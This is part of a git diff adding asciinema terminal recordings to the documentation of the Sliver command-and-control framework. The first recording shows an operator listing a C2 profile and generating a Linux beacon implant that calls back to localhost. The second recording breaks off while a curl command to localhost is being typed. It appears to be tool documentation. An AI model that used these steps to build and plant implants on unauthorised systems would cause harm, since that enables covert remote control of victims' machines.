"\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.491898, "o", "profi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[40.49257, "o", "\u001b[214D\u001b[1A\u001b[14D\u001b[9C\u001b[214D\u001b[14C\u001b[?25h"] +[40.549605, "o", "\u001b[?25l\u001b[214D"] +[40.551094, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.563066, "o", "profil\u001b[0m\u001b[0K\u001b[49m\r"] +[40.56325, "o", "\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[15D\u001b[9C\u001b[214D\u001b[15C\u001b[?25h"] +[40.581101, "o", "\u001b[?25l\u001b[214D"] +[40.582186, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.594132, "o", "profile\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[40.594895, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[16D\u001b[9C\u001b[214D\u001b[16C\u001b[?25h"] +[40.652994, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.659408, "o", "\u001b[1m\u001b[32mprofiles\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[17D\u001b[9C\u001b[214D\u001b[17C\u001b[?25h"] +[40.856596, "o", "\u001b[17D\u001b[9C\u001b[6n"] +[40.874955, "o", "\u001b[214D\u001b[17C\u001b[0J\u001b[214D\r\r\n"] +[40.878025, "o", "\u001b[0 q\r\n"] +[40.910692, "o", " Profile Name Implant Type Platform Command & Control Debug Format Obfuscation Limitations C2 Profile \r\n=============== ============== ============= ======================= ======= ============ ============= ============= ============\r\n rubyc2profile beacon linux/amd64 [1] https://localhost true EXECUTABLE disabled ruby \r\n\r\n"] +[40.922672, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[40.923553, "o", "\u001b[1 q\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.930142, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[40.931389, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[42.091647, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[42.114662, "o", "p\u001b[0m\u001b[0K\u001b[49m"] +[42.116142, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[42.199663, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[42.207437, "o", "pr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A"] +[42.20783, "o", "\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[42.307684, "o", "\u001b[?25l"] +[42.314942, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[42.32259, "o", "pro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[42.324083, "o", "\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[42.449625, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[42.46449, "o", "prof\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[42.495577, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[42.499706, "o", "profi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[42.500421, "o", "\u001b[214D\u001b[1A\u001b[14D\u001b[9C\u001b[214D\u001b[14C\u001b[?25h"] +[42.610565, "o", "\u001b[1 q"] +[42.651049, "o", "\u001b[1 q"] +[42.652594, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[42.667294, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[42.667774, "o", "\u001b[214D\u001b[1A\u001b[18D\u001b[9C\u001b[214D\u001b[18C\u001b[?25h"] +[43.028604, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[43.043158, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mg\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[19D\u001b[9C"] +[43.045266, "o", "\u001b[214D\u001b[19C\u001b[?25h"] +[43.086193, "o", "\u001b[?25l"] +[43.087628, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[43.091382, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mge\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[20D\u001b[9C\u001b[214D\u001b[20C\u001b[?25h"] +[43.234677, "o", "\u001b[?25l\u001b[214D"] +[43.236571, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[43.258207, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mgen\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[21D\u001b[9C\u001b[214D\u001b[21C\u001b[?25h"] +[43.278722, "o", "\u001b[?25l\u001b[214D"] +[43.27967, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[43.28902, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mgene\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[43.289839, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[22D\u001b[9C\u001b[214D\u001b[22C\u001b[?25h"] +[43.466245, "o", "\u001b[1 q"] +[43.501883, "o", "\u001b[1 q\u001b[?25l"] +[43.503625, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[43.513793, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mgenerate \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[43.514706, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[27D\u001b[9C\u001b[214D\u001b[27C\u001b[?25h"] +[44.590709, "o", "\u001b[27D\u001b[9C"] +[44.597172, "o", "\u001b[6n"] +[44.607989, "o", "\u001b[214D\u001b[27C\u001b[0J\u001b[214D\r\r\n"] +[44.608789, "o", "\u001b[0 q\r\n"] +[44.626856, "o", "Error: accepts 1 arg(s), received 0\r\n"] +[44.629236, "o", "Usage:\r\n profiles generate [flags]\r\n\r\nFlags:\r\n -G, --disable-sgn disable shikata ga nai shellcode encoder\r\n -h, --help help for generate\r\n -s, --save string directory/file to the binary to\r\n\r\nGlobal Flags:\r\n -t, --timeout int grpc timeout in seconds (default 60)\r\n\r\n"] +[44.630687, "o", "\r\n"] +[44.6392, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[44.639589, "o", "\u001b[1 q\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[44.650584, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[44.651137, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[45.851107, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[45.87223, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mgenerate\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[45.875295, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[26D\u001b[9C\u001b[214D\u001b[26C\u001b[?25h"] +[46.143718, "o", "\u001b[?25l"] +[46.154211, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[46.177588, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mgenerate \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[27D\u001b[9C"] +[46.179753, "o", "\u001b[214D\u001b[27C\u001b[?25h"] +[46.496135, "o", "\u001b[1 q"] +[46.553261, "o", "\u001b[1 q\u001b[?25l"] +[46.55356, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[46.554739, "o", "\u001b[6n"] +[46.557618, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mgenerate rubyc2profile \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[41D\u001b[9C\u001b[214D\u001b[41C\u001b[?25h"] +[47.102498, "o", "\u001b[41D\u001b[9C"] +[47.115639, "o", "\u001b[6n"] +[47.15072, "o", "\u001b[214D\u001b[41C\u001b[0J\u001b[214D\r\r\n"] +[47.152484, "o", "\u001b[0 q\r\n"] +[47.174531, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mGenerating new linux/amd64 beacon implant binary (1m0s)\r\n"] +[47.279969, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[47.38042, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[47.482622, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[47.584007, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[47.685111, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[47.787668, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[47.888575, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[47.989491, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[48.095394, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[48.195737, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[48.296425, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[48.400774, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[48.501115, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[48.601394, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[48.703694, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[48.804432, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[48.904991, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[49.008739, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[49.111122, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[49.211963, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[49.312678, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[49.41605, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[49.516658, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[49.617012, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[49.721773, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[49.822577, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[49.926102, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[50.027945, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[50.129633, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[50.230208, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[50.331449, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[50.432705, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[50.533486, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[50.634115, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[50.735088, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[50.835829, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[50.937012, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[51.037658, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[51.13811, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[51.238802, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[51.339384, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[51.439611, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[51.540481, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[51.641578, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[51.742189, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[51.843116, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[51.944513, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[52.044775, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[52.145419, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[52.24665, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[52.347899, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[52.448675, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[52.548878, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[52.649544, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[52.750914, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[52.851243, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[52.95578, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[53.057647, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[53.159399, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[53.260034, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[53.360943, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[53.46165, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[53.562852, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[53.662966, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[53.763569, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[53.864542, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[53.965561, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[54.066431, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[54.167275, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[54.267733, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[54.370531, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[54.471065, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[54.57173, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[54.672305, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[54.772736, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[54.873777, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[54.97493, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[55.075873, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[55.180964, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[55.281075, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[55.381828, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[55.482658, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[55.583011, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[55.686264, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[55.786923, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[55.887783, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[55.992701, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[56.09345, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[56.193715, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[56.294307, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[56.395041, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[56.496196, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[56.596524, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[56.697098, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[56.798146, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[56.899027, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[57.000679, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[57.101693, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[57.204178, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[57.305552, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[57.406075, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[57.506703, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[57.607736, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[57.708763, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[57.809747, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[57.910302, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[58.010753, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[58.110965, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[58.213099, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[58.313627, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[58.414383, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[58.515102, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[58.6157, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[58.716536, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[58.816918, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[58.917932, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[59.018887, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[59.11947, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[59.221657, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[59.325179, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[59.426236, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[59.526394, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[59.628343, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[59.728781, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[59.830545, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[59.931291, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[60.031909, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[60.13345, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[60.233744, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[60.334409, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[60.43903, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[60.53986, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[60.641183, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[60.742521, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[60.845122, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[60.945659, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[61.046263, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[61.150717, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[61.252405, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[61.35303, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[61.453724, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[61.525748, "o", "\r\u001b[2K"] +[61.526151, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mBuild completed in 14s\r\n"] +[61.540264, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mImplant saved to /root/ASHAMED_WHISKEY\r\n\r\n"] +[61.549793, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[61.550094, "o", "\u001b[1 q\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[61.558569, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[61.559081, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[71.047093, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[71.047469, "o", "\u001b[6n"] +[71.058268, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[71.058901, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[71.392535, "o", "\u001b[?25l"] +[71.396397, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[71.4165, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D"] +[71.417274, "o", "\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[71.698786, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[71.701075, "o", "\u001b[6n"] +[71.708329, "o", "exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[71.710145, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[72.985648, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[73.009435, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[73.009781, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[73.182195, "o", "\u001b[?25l"] +[73.192758, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[73.211661, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D"] +[73.211912, "o", "\u001b[10C\u001b[?25h"] +[73.35878, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[73.374168, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[73.375805, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[73.734311, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[73.750789, "o", "i\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[73.880835, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[73.883743, "o", "\u001b[6n"] +[73.90966, "o", "im\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A"] +[73.911553, "o", "\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[73.989321, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[73.993359, "o", "\u001b[6n"] +[74.016271, "o", "imp\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[74.043615, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[74.043762, "o", "\u001b[6n"] +[74.046477, "o", "impl\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[74.219479, "o", "\u001b[?25l"] +[74.221338, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[74.24193, "o", "impla\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[74.243527, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[14D\u001b[9C\u001b[214D\u001b[14C\u001b[?25h"] +[74.331302, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[74.348486, "o", "implan\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[74.348651, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[15D\u001b[9C\u001b[214D\u001b[15C\u001b[?25h"] +[74.489187, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[74.500297, "o", "implant\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[16D\u001b[9C\u001b[214D\u001b[16C\u001b[?25h"] +[74.566838, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[74.573073, "o", "\u001b[1m\u001b[32mimplants\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[17D\u001b[9C\u001b[214D\u001b[17C\u001b[?25h"] +[74.808286, "o", "\u001b[17D\u001b[9C"] +[74.813179, "o", "\u001b[6n"] +[74.846482, "o", "\u001b[214D\u001b[17C\u001b[0J\u001b[214D\r\r\n\u001b[0 q\r\n"] +[74.881318, "o", " Name Implant Type Template OS/Arch Format Command & Control Debug C2 Config ID Stage \r\n================= ============== ========== ============= ============ ======================= ======= =========== ======= =======\r\n ASHAMED_WHISKEY beacon sliver linux/amd64 EXECUTABLE [1] https://localhost true ruby 19778 false \r\n\r\n\r\n\r\n"] +[74.892365, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[74.893136, "o", "\u001b[1 q\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[74.896165, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[77.327059, "o", "\u001b[?25l"] +[77.329822, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[77.363208, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[77.365656, "o", "\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[77.504607, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[77.517902, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[77.686298, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[77.701406, "o", "exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[77.838144, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[77.862375, "o", "\u001b[1m\u001b[32mexit\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[77.864097, "o", "\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[78.126413, "o", "\u001b[13D\u001b[9C\u001b[6n"] +[78.141319, "o", "\u001b[214D\u001b[13C\u001b[0J\u001b[214D\r\r\n"] +[78.144216, "o", "\u001b[0 q\r\n"] +[78.162784, "o", "Exiting...\r\n"] +[78.208624, "o", "# "] +[79.362147, "o", "\r\n"] diff --git a/docs/sliver-docs/public/asciinema/implant_curl.cast b/docs/sliver-docs/public/asciinema/implant_curl.cast new file mode 100644 index 0000000000..8dcae67f5f --- /dev/null +++ b/docs/sliver-docs/public/asciinema/implant_curl.cast @@ -0,0 +1,88 @@ +{"version": 2, "width": 106, "height": 52, "timestamp": 1714672697, "env": {"SHELL": "/bin/bash", "TERM": "screen"}} +[0.14168, "o", "\u001b[?2004h"] +[0.149902, "o", "root@98df0494f659:~# "] +[1.00337, "o", "c"] +[1.088698, "o", "u"] +[1.219285, "o", "r"] +[1.353956, "o", "l"] +[1.520629, "o", " "] +[1.810089, "o", "h"] +[1.943522, "o", "t"] +[2.085822, "o", "t"] +[2.183263, "o", "p"] +[2.714314, "o", ":"] +[2.991856, "o", "/"] +[3.113514, "o", "/"] +[3.40613, "o", "l"] +[3.639895, "o", "o"] +[3.763378, "o", "c"] +[3.818227, "o", "a"] +[3.901598, "o", "l"] +[4.098185, "o", "h"] +[4.169684, "o", "o"] +[4.437642, "o", "s"] 